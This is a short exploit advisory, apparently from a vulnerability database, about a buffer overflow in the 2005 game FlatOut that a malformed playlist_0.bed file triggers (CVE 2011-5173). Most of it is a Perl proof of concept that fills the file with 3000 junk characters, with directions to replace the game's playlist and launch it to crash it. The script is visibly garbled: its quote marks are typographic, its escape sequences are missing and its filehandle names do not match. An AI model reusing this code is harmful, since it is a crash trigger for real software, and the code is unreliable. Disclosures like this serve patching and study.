Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow Exploit

Summary

Bugbear FlatOut 2005 Malformed .bed file suffers from buffer overflow vulnerability.

Credit:

The information has been provided by Silent_Dream.


Details

Vulnerable Systems:
 * Bugbear FlatOut 2005

my $file = ‘playlist_0.bed’;
my $head = ‘Title = ”;
my $junk = ‘a’ x 3000 . ”r’;
my $tail = ‘Loop = {‘ . ‘r}’;
open($File, ‘>$file’);
print $File $head.$junk.$tail;
close($FILE);
print ‘Overwrite the original playlist_0.bed file in %program files%\GOG.com\FlatOut\data\music and launch flatout.exe…wait for the crashrn’;

CVE Information:
2011-5173

Disclosure Timeline:
Published: 2011-11-30

Categories: Exploits